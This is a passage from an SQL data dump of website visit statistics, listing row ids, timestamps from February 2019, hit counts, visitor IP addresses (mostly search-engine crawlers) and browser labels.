0,'216.244.66.241','other'),(392060,1551210897,1,1,0,0,'54.36.150.61','other'),(392061,1551211050,1,1,0,0,'46.229.168.139','other'),(392062,1551211708,1,1,0,0,'207.46.13.81','other'),(392063,1551211763,1,1,0,0,'66.249.64.29','chrome'),(392064,1551211804,1,1,0,0,'54.36.148.24','other'),(392065,1551211941,1,1,0,0,'54.36.148.30','other'),(392066,1551211975,1,1,0,0,'66.249.64.31','chrome'),(392067,1551212034,1,1,0,0,'157.55.39.134','other'),(392068,1551212109,1,1,0,0,'40.77.167.127','other'),(392069,1551212380,1,1,0,0,'8.29.198.27','other'),(392070,1551212383,1,1,0,0,'54.36.149.13','other'),(392071,1551213212,2,2,0,0,'66.249.64.30','chrome'),(392072,1551213408,1,1,0,0,'54.36.148.231','other'),(392073,1551213665,1,1,0,0,'8.29.198.26','other'),(392074,1551213713,1,1,0,0,'54.36.149.52','other'),(392075,1551213926,1,1,0,0,'54.36.150.187','other'),(392076,1551214021,1,1,0,0,'157.55.39.134','other'),(392077,1551214274,2,2,0,0,'207.46.13.114','other'),(392078,1551214292,1,1,0,0,'66.249.64.60','chrome'),(392079,1551214505,1,1,0,0,'66.249.64.29','chrome'),(392080,1551215194,1,1,0,0,'54.36.149.8','other'),(392081,1551215357,1,1,0,0,'66.249.64.30','chrome'),(392082,1551215590,2,2,0,0,'66.249.64.29','chrome'),(392083,1551215656,1,1,0,0,'66.249.64.58','chrome'),(392084,1551215840,1,1,0,0,'46.229.168.139','other'),(392085,1551215944,1,1,0,0,'54.36.150.151','other'),(392086,1551215972,1,1,0,0,'66.249.64.62','chrome'),(392087,1551216246,1,1,0,0,'180.76.15.13','other'),(392088,1551216329,1,1,0,0,'40.77.167.127','other'),(392089,1551216552,1,1,0,0,'66.249.64.29','chrome'),(392090,1551216626,1,1,0,0,'216.244.66.241','other'),(392091,1551216634,1,1,0,0,'54.36.150.156','other'),(392092,1551216766,1,1,0,0,'66.249.64.30','chrome'),(392093,1551216876,1,1,0,0,'157.55.39.134','other'),(392094,1551216986,1,1,0,0,'54.36.150.31','other'),(392095,1551217296,1,1,0,0,'54.36.150.152','other'),(392096,1551217319,2,2,0,0,'207.46.13.114','other'),(392097,1551218014,1,1,0,0,'46.229.168.145','other'),(392098,1551218225,1,1,0,0,'54.36.149.26','other'),(392099,1551218239,1,1,0,0,'89.204.155.86','chrome'),(392100,1551218254,1,1,0,0,'216.244.66.241','other'),(392101,1551218374,1,1,0,0,'207.46.13.81','other'),(392102,1551218655,1,1,0,0,'54.36.148.2','other'),(392103,1551218667,1,1,0,0,'46.229.168.149','other'),(392104,1551218674,1,1,0,0,'66.249.64.31','chrome'),(392105,1551219116,1,1,0,0,'207.46.13.114','other'),(392106,1551219177,1,1,0,0,'54.36.148.186','other'),(392107,1551219583,1,1,0,0,'66.249.64.62','chrome'),(392108,1551219613,1,1,0,0,'54.36.148.46','other'),(392109,1551219649,1,1,0,0,'54.36.150.186','other'),(392110,1551219814,1,1,0,0,'13.66.139.0','other'),(392111,1551220101,1,1,0,0,'54.36.150.115','other'),(392112,1551220481,1,1,0,0,'66.249.64.29','chrome'),(392113,1551220637,1,1,0,0,'5.45.207.19','other'),(392114,1551220773,1,1,0,0,'54.36.150.15','other'),(392115,1551220836,2,2,0,0,'66.249.64.31','chrome'),(392116,1551220941,1,1,0,0,'207.46.13.114','other'),(392117,1551221102,1,1,0,0,'54.36.148.79','other'),(392118,1551221459,1,1,0,0,'91.209.11.236','other'),(392119,1551221523,2,2,0,0,'66.249.64.29','chrome'),(392120,1551221567,1,1,0,0,'180.76.15.162','other'),(392121,1551221899,1,1,0,0,'207.46.13.114','other'),(392122,1551222037,2,2,0,0,'66.249.64.30','chrome'),(392123,1551222056,1,1,0,0,'87.250.224.107','other'),(392124,1551222134,1,1,0,0,'141.8.142.108','other'),(392125,1551222189,1,1,0,0,'95.108.213.50','other'),(392126,1551222194,1,1,0,0,'5.255.253.38','other'),(392127,1551222273,2,2,0,0,'37.9.113.148','other'),(392128,1551222305,1,1,0,0,'5.45.207.19','other'),(392129,1551222564,3,3,0,0,'5.45.207.79','other'),(392130,1551222574,2,2,0,0,'66.249.64.31','chrome'),(392131,1551222587,1,1,0,0,'87.250.224.47','other'),(392132,1551222611,2,2,0,0,'178.154.244.11','other'),(392133,1551222808,1,1,0,0,'66.249.64.29','chrome'),(392134,1551222853,1,1,0,0,'207.46.13.114','other'),(392135,1551222889,1,1,0,0,'66.249.64.62','chrome'),(392136,1551223030,1,1,0,0,'54.36.150.41','other'),(392137,1551223038,1,1,0,0,'54.36.149.90','other'),(392138,1551223084,1,1,0,0,'91.209.11.236','other'),(392139,1551223097,1,1,0,0,'141.8.142.144','other'),(392140,1551223230,1,1,0,0,'8.29.198.26','other'),(392141,1551223272,1,1,0,0,'54.36.149.5','other'),(392142,1551223278,1,1,0,0,'5.45.207.19','other'),(392143,1551223476,2,2,0,0,'5.45.207.79','other'),(392144,1551223510,2,2,0,0,'66.249.64.31','chrome'),(392145,1551224033,2,2,0,0,'91.209.11.236','other'),(392146,1551224071,1,1,0,0,'54.36.149.36','other'),(392147,1551224126,1,1,0,0,'66.249.64.30','chrome'),(392148,1551224238,1,1,0,0,'5.45.207.19','other'),(392149,1551224279,1,1,0,0,'37.9.113.20','other'),(392150,1551224524,1,1,0,0,'8.29.198.27','other'),(392151,1551224611,1,1,0,0,'46.229.168.133','other'),(392152,1551224633,1,1,0,0,'5.45.207.79','other'),(392153,1551224652,1,1,0,0,'66.249.64.60','chrome'),(392154,1551224681,1,1,0,0,'95.108.181.54','other'),(392155,1551224834,1,1,0,0,'207.46.13.114','other'),(392156,1551224947,1,1,0,0,'46.229.168.152','other'),(392157,1551225287,1,1,0,0,'54.36.148.12','other'),(392158,1551225402,1,1,0,0,'54.36.148.102','other'),(392159,1551225722,1,1,0,0,'95.163.255.114','other'),(392160,1551225878,1,1,0,0,'54.36.148.230','other'),(392161,1551225930,1,1,0,0,'54.36.148.36','other'),(392162,1551226322,1,1,0,0,'54.36.148.74','other'),(392163,1551226466,1,1,0,0,'216.244.66.241','other'),(392164,1551226636,1,1,0,0,'54.36.148.134','other'),(392165,1551226712,1,1,0,0,'46.229.168.132','other'),(392166,1551226981,1,1,0,0,'46.229.168.137','other'),(392167,1551227117,1,1,0,0,'66.249.64.62','chrome'),(392168,1551227683,1,1,0,0,'54.36.149.75','other'),(392169,1551228224,1,1,0,0,'54.36.149.63','other'),(392170,1551228474,1,1,0,0,'66.249.64.31','chrome'),(392171,1551229083,1,1,0,0,'66.249.64.29','chrome'),(392172,1551229123,2,2,0,0,'178.154.244.11','other'),(392173,1551229153,1,1,0,0,'54.36.148.137','other'),(392174,1551229269,3,3,0,0,'216.244.66.241','other'),(392175,1551229348,1,1,0,0,'54.36.148.250','other'),(392176,1551229559,1,1,0,0,'54.36.148.55','other'),(392177,1551229618,1,1,0,0,'66.249.64.62','chrome'),(392178,1551229798,1,1,0,0,'54.36.149.99','other'),(392179,1551230009,3,3,0,0,'66.249.64.30','chrome'),(392180,1551230046,3,3,0,0,'66.249.64.31','chrome'),(392181,1551230054,1,1,0,0,'54.36.149.45','other'),(392182,1551230683,1,1,0,0,'185.129.62.63','chrome'),(392183,1551230929,1,1,0,0,'54.36.148.81','other'),(392184,1551230959,1,1,0,0,'157.55.39.206','other'),(392185,1551231511,1,1,0,0,'54.36.149.35','other'),(392186,1551231719,1,1,0,0,'66.249.64.31','chrome'),(392187,1551231728,1,1,0,0,'216.244.66.241','other'),(392188,1551232524,1,1,0,0,'54.36.150.53','other'),(392189,1551232569,1,1,0,0,'141.8.142.103','other'),(392190,1551232581,1,1,0,0,'54.36.149.75','other'),(392191,1551232675,1,1,0,0,'54.36.149.82','other'),(392192,1551232923,1,1,0,0,'66.249.64.62','chrome'),(392193,1551233172,1,1,0,0,'54.36.148.183','other'),(392194,1551233196,1,1,0,0,'66.249.64.60','chrome'),(392195,1551233245,1,1,0,0,'157.55.39.177','other'),(392196,1551233936,1,1,0,0,'46.229.168.136','other'),(392197,1551234072,1,1,0,0,'8.29.198.25','other'),(392198,1551234201,1,1,0,0,'46.229.168.148','other'),(392199,1551234468,1,1,0,0,'157.55.39.117','other'),(392200,1551234924,1,1,0,0,'66.249.64.31','chrome'),(392201,1551235104,1,1,0,0,'66.249.64.30','chrome'),(392202,1551235378,1,1,0,0,'8.29.198.25','other'),(392203,1551235990,1,1,0,0,'46.229.168.135','other'),(392204,1551236149,1,1,0,0,'66.249.64.30','chrome'),(392205,1551237091,1,1,0,0,'54.36.150.174','other'),(392206,1551237271,1,1,0,0,'54.36.148.138','other'),(392207,1551237301,1,1,0,0,'54.36.150.182','other'),(392208,1551237502,1,1,0,0,'54.36.150.67','other'),(392209,1551237724,1,1,0,0,'54.36.150.57','other'),(392210,1551237736,1,1,0,0,'54.36.148.194','other'),(392211,1551237856,1,1,0,0,'54.36.148.237','other'),(392212,1551238138,1,1,0,0,'54.36.148.163','other'),(392213,1551238278,1,1,0,0,'66.249.64.58','chrome'),(392214,1551238481,4,4,0,0,'5.45.207.79','other'),(392215,1551238492,2,2,0,0,'5.45.207.19','other'),(392216,1551238582,1,1,0,0,'141.8.142.103','other'),(392217,1551238606,1,1,0,0,'37.9.113.148','other'),(392218,1551238633,1,1,0,0,'40.77.167.115','other'),(392219,1551238708,1,1,0,0,'46.229.168.143','other'),(392220,1551239081,1,1,0,0,'54.36.149.28','other'),(392221,1551239272,1,1,0,0,'54.36.148.33','other'),(392222,1551239719,15,15,0,0,'66.249.64.29','chrome'),(392223,1551239943,1,1,0,0,'66.249.64.31','chrome'),(392224,1551239952,2,2,0,0,'66.249.64.30','chrome'),(392225,1551239999,1,1,0,0,'54.36.148.157','other'),(392226,1551240045,2,2,0,0,'66.249.64.62','chrome'),(392227,1551240590,1,1,0,0,'54.36.148.194','other'),(392228,1551240675,1,1,0,0,'54.36.149.59','other'),(392229,1551240927,1,1,0,0,'54.36.149.37','other'),(392230,1551241240,1,1,0,0,'54.36.148.73','other'),(392231,1551241319,1,1,0,0,'54.36.149.49','other'),(392232,1551241325,3,3,0,0,'66.249.64.29','chrome'),(392233,1551241793,1,1,0,0,'54.36.150.147','other'),(392234,1551241944,2,2,0,0,'66.249.64.31','chrome'),(392235,1551242012,1,1,0,0,'54.36.150.160','other'),(392236,1551242330,1,1,0,0,'54.36.149.51','other'),(392237,1551242414,2,2,0,0,'178.154.244.11','other'),(392238,1551242557,2,2,0,0,'66.249.64.29','chrome'),(392239,1551243472,1,1,0,0,'54.36.148.31','other'),(392240,1551243565,1,1,0,0,'91.196.178.135','firefox'),(392241,1551244079,2,2,0,0,'66.249.64.29','chrome'),(392242,1551244173,1,1,0,0,'54.36.150.9','other'),(392243,1551244394,1,1,0,0,'54.36.150.139','other'),(392244,1551244485,2,2,0,0,'54.212.225.251','chrome'),(392245,1551244624,1,1,0,0,'54.36.148.215','other'),(392246,1551244796,1,1,0,0,'157.55.39.117','other'),(392247,1551244841,1,1,0,0,'54.36.148.113','other'),(392248,1551245176,1,1,0,0,'207.46.13.124','other'),(392249,1551245261,1,1,0,0,'216.244.66.241','other'),(392250,1551245306,1,1,0,0,'8.29.198.25','other'),(392251,1551245506,1,1,0,0,'54.36.148.115','other'),(392252,1551245835,1,1,0,0,'46.229.168.143','other'),(392253,1551245994,1,1,0,0,'66.249.64.58','chrome'),(392254,1551246504,1,1,0,0,'66.249.64.29','chrome'),(392255,1551246658,1,1,0,0,'54.36.150.11','other'),(392256,1551246840,2,2,0,0,'66.249.64.30','chrome'),(392257,1551246966,1,1,0,0,'8.29.198.25','other'),(392258,1551247177,2,2,0,0,'66.249.64.62','chrome'),(392259,1551247290,1,1,0,0,'54.36.150.91','other'),(392260,1551247453,1,1,0,0,'54.36.150.78','other'),(392261,1551247484,1,1,0,0,'216.244.66.241','other'),(392262,1551247662,1,1,0,0,'54.36.148.78','other'),(392263,1551247708,1,1,0,0,'91.196.178.173','chrome'),(392264,1551247792,1,1,0,0,'54.36.149.61','other'),(392265,1551247826,1,1,0,0,'46.229.168.150','other'),(392266,1551248186,1,1,0,0,'87.120.36.157','other'),(392267,1551248476,1,1,0,0,'216.244.66.241','other'),(392268,1551248510,4,4,0,0,'66.249.64.29','chrome'),(392269,1551248832,1,1,0,0,'54.36.148.179','other'),(392270,1551248953,1,1,0,0,'66.249.64.31','chrome'),(392271,1551249078,1,1,0,0,'91.196.178.66','chrome'),(392272,1551249494,1,1,0,0,'157.55.39.155','other'),(392273,1551249535,1,1,0,0,'54.36.148.191','other'),(392274,1551249843,1,1,0,0,'46.229.168.147','other'),(392275,1551249853,1,1,0,0,'66.249.64.58','chrome'),(392276,1551250043,1,1,0,0,'66.249.64.31','chrome'),(392277,1551250307,2,2,0,0,'66.249.64.30','chrome'),(392278,1551250327,1,1,0,0,'66.249.64.62','chrome'),(392279,1551250379,1,1,0,0,'66.249.64.29','chrome'),(392280,1551250622,1,1,0,0,'54.36.149.66','other'),(392281,1551250984,1,1,0,0,'66.249.64.60','chrome'),(392282,1551250994,1,1,0,0,'54.36.150.172','other'),(392283,1551251025,1,1,0,0,'146.120.27.100','chrome'),(392284,1551251051,2,2,0,0,'91.196.178.87','chrome'),(392285,1551251331,1,1,0,0,'66.249.64.30','chrome'),(392286,1551251355,1,1,0,0,'66.249.64.29','chrome'),(392287,1551251485,1,1,0,0,'91.211.135.230','chrome'),(392288,1551251574,1,1,0,0,'66.249.64.31','chrome'),(392289,1551251799,1,1,0,0,'46.166.137.212','other'),(392290,1551251872,1,1,0,0,'66.249.64.58','chrome'),(392291,1551252068,1,1,0,0,'54.36.150.22','other'),(392292,1551252118,1,1,0,0,'91.215.53.210','chrome'),(392293,1551252196,1,1,0,0,'40.77.167.31','other'),(392294,1551252525,1,1,0,0,'91.196.178.163','chrome'),(392295,1551252693,1,1,0,0,'54.36.149.88','other'),(392296,1551252731,1,1,0,0,'91.196.178.173','chrome'),(392297,1551252804,1,1,0,0,'91.196.178.87','chrome'),(392298,1551252894,1,1,0,0,'213.108.41.211','chrome'),(392299,1551253219,1,1,0,0,'54.36.149.1','other'),(392300,1551253609,1,1,0,0,'54.36.149.3','other'),(392301,1551253626,1,1,0,0,'91.196.178.133','firefox'),(392302,1551253658,1,1,0,0,'54.36.150.84','other'),(392303,1551253741,1,1,0,0,'66.249.64.62','chrome'),(392304,1551253794,1,1,0,0,'91.196.178.87','chrome'),(392305,1551253796,1,1,0,0,'54.36.148.87','other'),(392306,1551253799,1,1,0,0,'54.36.149.101','other'),(392308,1551253916,1,1,0,0,'66.249.64.58','chrome'),(392309,1551254016,1,1,0,0,'54.36.150.49','other'),(392310,1551254160,1,1,0,0,'92.113.4.170','chrome'),(392311,1551254473,1,1,0,0,'40.77.167.31','other'),(392312,1551254492,1,1,0,0,'157.55.39.107','other'),(392313,1551254606,1,1,0,0,'91.196.178.94','chrome'),(392314,1551254700,1,1,0,0,'66.249.64.29','chrome'),(392315,1551254929,3,3,0,0,'66.249.64.30','chrome'),(392316,1551255013,1,1,0,0,'54.36.148.104','other'),(392317,1551255141,1,1,0,0,'40.77.167.146','other'),(392318,1551255235,2,2,0,0,'66.249.64.31','chrome'),(392319,1551255441,1,1,0,0,'178.93.207.202','chrome'),(392320,1551255505,2,2,0,0,'66.249.64.60','chrome'),(392321,1551255634,1,1,0,0,'91.196.177.46','firefox'),(392322,1551255696,1,1,0,0,'54.36.148.152','other'),(392323,1551255753,1,1,0,0,'78.154.187.11','chrome'),(392324,1551255773,2,2,0,0,'5.45.207.19','other'),(392325,1551255840,2,2,0,0,'95.108.213.4','other'),(392326,1551255898,1,1,0,0,'54.36.148.190','other'),(392327,1551255938,1,1,0,0,'37.9.113.148','other'),(392328,1551256120,2,2,0,0,'37.9.113.103','other'),(392329,1551256231,1,1,0,0,'8.29.198.27','other'),(392330,1551256235,1,1,0,0,'87.250.224.81','other'),(392331,1551256238,1,1,0,0,'87.250.224.47','other'),(392332,1551256407,1,1,0,0,'46.229.168.141','other'),(392333,1551256610,2,2,0,0,'66.249.64.58','chrome'),(392334,1551256627,2,2,0,0,'95.108.181.54','other'),(392335,1551256644,1,1,0,0,'5.255.253.38','other'),(392336,1551256831,2,2,0,0,'87.250.224.65','other'),(392337,1551256834,2,2,0,0,'66.249.64.30','chrome'),(392338,1551256924,1,1,0,0,'66.249.64.29','chrome'),(392339,1551257054,1,1,0,0,'87.250.224.118','other'),(392340,1551257057,1,1,0,0,'178.154.171.30','other'),(392341,1551257186,1,1,0,0,'54.36.150.98','other'),(392342,1551257274,1,1,0,0,'87.250.224.107','other'),(392343,1551257445,1,1,0,0,'95.108.181.94','other'),(392344,1551257464,1,1,0,0,'54.36.149.15','other'),(392345,1551257519,1,1,0,0,'54.36.148.77','other'),(392346,1551257545,1,1,0,0,'95.108.213.4','other'),(392347,1551257653,3,3,0,0,'178.154.244.11','other'),(392348,1551257697,1,1,0,0,'157.55.39.57','other'),(392349,1551257755,1,1,0,0,'91.196.178.87','chrome'),(392350,1551257839,2,2,0,0,'5.45.207.79','other'),(392351,1551257843,2,2,0,0,'141.8.142.103','other'),(392352,1551257974,1,1,0,0,'8.29.198.25','other'),(392353,1551258201,1,1,0,0,'91.196.178.94','chrome'),(392354,1551258566,1,1,0,0,'46.229.168.135','other'),(392355,1551258609,1,1,0,0,'66.249.64.31','chrome'),(392356,1551258969,2,2,0,0,'5.45.207.19','other'),(392357,1551259227,1,1,0,0,'91.196.178.169','firefox'),(392358,1551260240,1,1,0,0,'46.229.168.138','other'),(392359,1551260288,1,1,0,0,'178.154.244.11','other'),(392360,1551260373,1,1,0,0,'66.249.64.31','chrome'),(392361,1551260446,1,1,0,0,'95.132.12.128','firefox'),(392362,1551260448,1,1,0,0,'66.249.64.29','chrome'),(392363,1551261031,1,1,0,0,'46.229.168.152','other'),(392364,1551261122,1,1,0,0,'40.77.167.123','other'),(392365,1551261588,1,1,0,0,'91.196.178.65','chrome'),(392366,1551262151,2,2,0,0,'95.213.141.126','opera'),(392367,1551262211,2,2,0,0,'46.200.254.170','firefox'),(392368,1551262296,1,1,0,0,'66.249.64.60','chrome'),(392369,1551262349,1,1,0,0,'66.249.64.62','chrome'),(392370,1551262462,2,2,0,0,'95.132.12.128','firefox'),(392371,1551262651,1,1,0,0,'95.132.12.128','chrome'),(392372,1551262927,2,2,0,0,'66.249.64.31','chrome'),(392373,1551263061,1,1,0,0,'91.196.178.87','chrome'),(392374,1551263190,1,1,0,0,'46.229.168.142','other'),(392375,1551263391,1,1,0,0,'95.132.12.128','firefox'),(392376,1551263765,1,1,0,0,'66.249.64.62','chrome'),(392377,1551263807,2,2,0,0,'66.249.64.30','chrome'),(392378,1551264094,1,1,0,0,'66.249.64.31','chrome'),(392379,1551264163,1,1,0,0,'66.249.64.29','chrome'),(392380,1551264192,1,1,0,0,'216.244.66.241','other'),(392381,1551264609,1,1,0,0,'5.45.207.19','other'),(392382,1551264800,1,1,0,0,'46.201.55.181','firefox'),(392383,1551264889,1,1,0,0,'91.196.178.94','chrome'),(392384,1551264912,1,1,0,0,'91.196.178.163','chrome'),(392385,1551265099,1,1,0,0,'60.191.38.77','firefox'),(392386,1551265826,2,2,0,0,'207.46.13.219','other'),(392387,1551266557,1,1,0,0,'46.201.55.181','firefox'),(392388,1551266712,1,1,0,0,'91.196.178.103','chrome'),(392389,1551266892,1,1,0,0,'46.229.168.146','other'),(392390,1551267076,1,1,0,0,'8.29.198.25','other'),(392391,1551267242,3,3,0,0,'66.249.64.29','chrome'),(392392,1551267400,1,1,0,0,'66.249.64.31','chrome'),(392393,1551267591,1,1,0,0,'91.196.178.61','chrome'),(392394,1551267645,1,1,0,0,'207.46.13.219','other'),(392395,1551268679,1,1,0,0,'81.163.115.169','firefox'),(392396,1551268825,1,1,0,0,'8.29.198.25','other'),(392397,1551269751,1,1,0,0,'94.179.209.216','chrome'),(392398,1551269794,2,2,0,0,'46.229.168.136','other'),(392399,1551270110,1,1,0,0,'91.196.177.228','chrome'),(392400,1551270155,1,1,0,0,'157.55.39.140','other'),(392401,1551270530,1,1,0,0,'157.55.39.250','other'),(392402,1551270645,1,1,0,0,'178.154.244.11','other'),(392403,1551270809,2,2,0,0,'91.196.178.190','chrome'),(392404,1551270882,1,1,0,0,'207.46.13.221','other'),(392405,1551270921,1,1,0,0,'66.249.64.29','chrome'),(392406,1551271359,1,1,0,0,'13.66.139.0','other'),(392407,1551271411,1,1,0,0,'207.46.13.218','other'),(392408,1551271577,1,1,0,0,'146.185.157.173','chrome'),(392409,1551271671,1,1,0,0,'216.244.66.241','other'),(392410,1551271703,1,1,0,0,'66.249.64.30','chrome'),(392411,1551271958,1,1,0,0,'46.229.168.153','other'),(392412,1551272483,1,1,0,0,'66.249.64.31','chrome'),(392413,1551272626,1,1,0,0,'66.249.64.62','chrome'),(392414,1551272640,1,1,0,0,'91.196.178.94','chrome'),(392415,1551272774,1,1,0,0,'66.249.64.29','chrome'),(392416,1551272901,1,1,0,0,'66.249.64.30','chrome'),(392417,1551273202,1,1,0,0,'46.229.168.147','other'),(392418,1551273266,1,1,0,0,'184.94.240.92','firefox'),(392419,1551273313,1,1,0,0,'46.107.228.100','firefox'),(392420,1551273315,1,1,0,0,'91.196.178.81','chrome'),(392421,1551273635,1,1,0,0,'91.196.178.87','chrome'),(392422,1551273876,1,1,0,0,'46.229.168.130','other'),(392423,1551273882,1,1,0,0,'46.229.168.136','other'),(392424,1551274316,1,1,0,0,'91.196.178.81','chrome'),(392425,1551274446,1,1,0,0,'66.249.64.31','chrome'),(392426,1551274628,1,1,0,0,'216.244.66.241','other'),(392427,1551274871,1,1,0,0,'66.249.64.30','chrome'),(392428,1551274900,1,1,0,0,'46.229.168.142','other'),(392429,1551274946,2,2,0,0,'66.249.64.58','chrome'),(392430,1551275015,2,2,0,0,'66.249.64.62','chrome'),(392431,1551275203,2,2,0,0,'79.143.39.102','chrome'),(392432,1551275260,1,1,0,0,'87.250.224.81','other'),(392433,1551275264,1,1,0,0,'91.196.177.46','firefox'),(392434,1551275482,1,1,0,0,'178.154.244.65','other'),(392435,1551275514,3,3,0,0,'5.45.207.79','other'),(392436,1551275557,1,1,0,0,'91.196.177.46','chrome'),(392437,1551275582,1,1,0,0,'178.154.171.24','other'),(392438,1551275584,1,1,0,0,'91.196.178.87','firefox'),(392439,1551275638,4,4,0,0,'178.154.244.11','other'),(392440,1551275837,1,1,0,0,'40.77.167.140','other'),(392441,1551275861,1,1,0,0,'176.102.58.32','firefox'),(392442,1551275961,2,2,0,0,'5.45.207.19','other'),(392443,1551276165,1,1,0,0,'66.249.64.60','chrome'),(392444,1551276317,1,1,0,0,'46.201.104.29','chrome'),(392445,1551276423,2,2,0,0,'5.45.207.79','other'),(392446,1551276444,1,1,0,0,'46.229.168.149','other'),(392447,1551276658,1,1,0,0,'66.249.64.31','chrome'),(392448,1551276689,1,1,0,0,'66.249.64.58','chrome'),(392449,1551276696,1,1,0,0,'178.154.244.11','other'),(392450,1551276762,1,1,0,0,'91.196.178.84','chrome'),(392451,1551276824,1,1,0,0,'94.153.129.42','chrome'),(392452,1551276897,1,1,0,0,'95.134.220.149','chrome'),(392453,1551276915,1,1,0,0,'46.229.168.146','other'),(392454,1551277104,1,1,0,0,'91.196.178.81','chrome'),(392455,1551277178,1,1,0,0,'91.237.41.146','chrome'),(392456,1551277378,1,1,0,0,'178.255.215.94','other'),(392457,1551277877,3,3,0,0,'66.249.64.29','chrome'),(392458,1551277922,1,1,0,0,'8.29.198.25','other'),(392459,1551278221,1,1,0,0,'66.249.64.30','chrome'),(392460,1551278468,1,1,0,0,'91.196.178.131','chrome'),(392461,1551278711,1,1,0,0,'95.28.230.119','msie'),(392462,1551278737,1,1,0,0,'95.133.46.71','chrome'),(392463,1551279088,1,1,0,0,'207.46.13.108','other'),(392464,1551279138,1,1,0,0,'157.55.39.250','other'),(392465,1551279443,1,1,0,0,'91.196.178.87','firefox'),(392466,1551279675,1,1,0,0,'8.29.198.25','other'),(392467,1551280327,1,1,0,0,'46.229.168.146','other'),(392468,1551280574,1,1,0,0,'40.77.167.74','other'),(392469,1551280773,1,1,0,0,'66.249.64.58','chrome'),(392470,1551281231,1,1,0,0,'207.46.13.108','other'),(392471,1551281445,1,1,0,0,'66.249.64.29','chrome'),(392472,1551281788,1,1,0,0,'46.133.132.159','firefox'),(392473,1551282724,1,1,0,0,'66.249.64.31','chrome'),(392474,1551282731,1,1,0,0,'46.229.168.135','other'),(392475,1551282743,1,1,0,0,'46.229.168.142','other'),(392476,1551283006,1,1,0,0,'207.46.13.108','other'),(392477,1551284017,1,1,0,0,'66.249.64.31','chrome'),(392478,1551284659,1,1,0,0,'216.244.66.241','other'),(392479,1551285033,1,1,0,0,'180.76.15.12','other'),(392480,1551285186,1,1,0,0,'46.229.168.151','other'),(392481,1551285899,1,1,0,0,'66.249.64.60','chrome'),(392482,1551286555,1,1,0,0,'109.201.154.129','other'),(392483,1551286686,1,1,0,0,'40.77.167.130','other'),(392484,1551287492,1,1,0,0,'46.229.168.132','other'),(392485,1551288111,1,1,0,0,'40.77.167.22','other'),(392486,1551288119,1,1,0,0,'180.76.15.23','other'),(392487,1551288350,1,1,0,0,'46.211.113.154','chrome'),(392488,1551288362,1,1,0,0,'46.229.168.146','other'),(392489,1551288380,1,1,0,0,'40.77.167.88','other'),(392490,1551288605,1,1,0,0,'66.249.64.60','chrome'),(392491,1551288772,1,1,0,0,'8.29.198.27','other'),(392492,1551289203,1,1,0,0,'66.249.64.30','chrome'),(392493,1551289529,1,1,0,0,'40.77.167.88','other'),(392494,1551290043,1,1,0,0,'216.244.66.241','other'),(392495,1551290250,1,1,0,0,'66.249.64.60','chrome'),(392496,1551290518,1,1,0,0,'8.29.198.25','other'),(392497,1551290530,1,1,0,0,'207.46.13.108','other'),(392498,1551291643,1,1,0,0,'91.196.178.70','firefox'),(392499,1551291667,1,1,0,0,'66.249.64.62','chrome'),(392500,1551293022,1,1,0,0,'40.77.167.100','other'),(392501,1551294240,2,2,0,0,'66.249.64.30','chrome'),(392502,1551295009,1,1,0,0,'95.108.181.54','other'),(392503,1551295218,1,1,0,0,'46.229.168.139','other'),(392504,1551295239,2,2,0,0,'5.45.207.19','other'),(392505,1551295300,1,1,0,0,'95.108.213.4','other'),(392506,1551295309,2,2,0,0,'5.45.207.79','other'),(392507,1551295328,2,2,0,0,'87.250.224.47','other'),(392508,1551295419,1,1,0,0,'5.45.207.8','other'),(392509,1551295742,2,2,0,0,'141.8.142.103','other'),(392510,1551296120,1,1,0,0,'46.229.168.142','other'),(392511,1551296295,3,3,0,0,'5.45.207.79','other'),(392512,1551296301,1,1,0,0,'46.229.168.150','other'),(392513,1551296390,1,1,0,0,'66.249.64.30','chrome'),(392514,1551296615,1,1,0,0,'46.211.131.250','chrome'),(392515,1551296698,1,1,0,0,'40.77.167.88','other'),(392516,1551296879,1,1,0,0,'178.154.244.11','other'),(392517,1551296895,1,1,0,0,'95.108.213.4','other'),(392518,1551297132,1,1,0,0,'46.229.168.141','other'),(392519,1551297255,1,1,0,0,'66.249.64.62','chrome'),(392520,1551297374,1,1,0,0,'91.196.178.62','chrome'),(392521,1551297488,1,1,0,0,'87.250.224.64','other'),(392522,1551297520,1,1,0,0,'87.250.224.47','other'),(392523,1551297657,1,1,0,0,'37.9.113.103','other'),(392524,1551297659,2,2,0,0,'37.9.113.20','other'),(392525,1551297855,1,1,0,0,'141.8.142.38','other'),(392526,1551297917,1,1,0,0,'95.108.181.54','other'),(392527,1551298030,1,1,0,0,'141.8.183.23','other'),(392528,1551298147,1,1,0,0,'66.249.64.30','chrome'),(392529,1551298170,1,1,0,0,'5.45.207.19','other'),(392530,1551298586,4,4,0,0,'40.77.167.88','other'),(392531,1551298591,4,4,0,0,'40.77.167.139','other'),(392532,1551298595,2,2,0,0,'40.77.167.205','other'),(392533,1551298611,3,3,0,0,'157.55.39.225','other'),(392534,1551298800,1,1,0,0,'91.196.178.84','chrome'),(392535,1551299333,1,1,0,0,'46.229.168.144','other'),(392536,1551299412,1,1,0,0,'46.229.168.142','other'),(392537,1551299619,1,1,0,0,'8.29.198.25','other'),(392538,1551299800,1,1,0,0,'40.77.167.205','other'),(392539,1551300536,1,1,0,0,'46.229.168.142','other'),(392540,1551300611,1,1,0,0,'157.55.39.225','other'),(392541,1551300780,1,1,0,0,'46.229.168.150','other'),(392542,1551301036,1,1,0,0,'66.249.64.29','chrome'),(392543,1551301093,1,1,0,0,'40.77.167.205','other'),(392544,1551301163,1,1,0,0,'66.249.64.30','chrome'),(392545,1551301359,1,1,0,0,'8.29.198.27','other'),(392546,1551301663,1,1,0,0,'216.244.66.241','other'),(392547,1551303130,2,2,0,0,'157.55.39.72','other'),(392548,1551303526,4,4,0,0,'216.244.66.241','other'),(392549,1551303834,2,2,0,0,'66.249.64.30','chrome'),(392550,1551304295,1,1,0,0,'66.249.64.62','chrome'),(392551,1551304627,1,1,0,0,'46.229.168.140','other'),(392552,1551304727,1,1,0,0,'157.55.39.225','other'),(392553,1551305530,1,1,0,0,'66.249.64.29','chrome'),(392554,1551306140,1,1,0,0,'66.249.64.31','chrome'),(392555,1551306552,1,1,0,0,'216.244.66.241','other'),(392556,1551306719,1,1,0,0,'115.146.127.55','firefox'),(392557,1551306836,2,2,0,0,'207.46.13.129','other'),(392558,1551307215,1,1,0,0,'66.249.64.58','chrome'),(392559,1551307489,1,1,0,0,'46.229.168.135','other'),(392560,1551307652,1,1,0,0,'207.46.13.2','other'),(392561,1551307970,1,1,0,0,'66.249.64.60','chrome'),(392562,1551308030,1,1,0,0,'157.55.39.72','other'),(392563,1551310172,1,1,0,0,'66.249.64.30','chrome'),(392564,1551310349,1,1,0,0,'46.2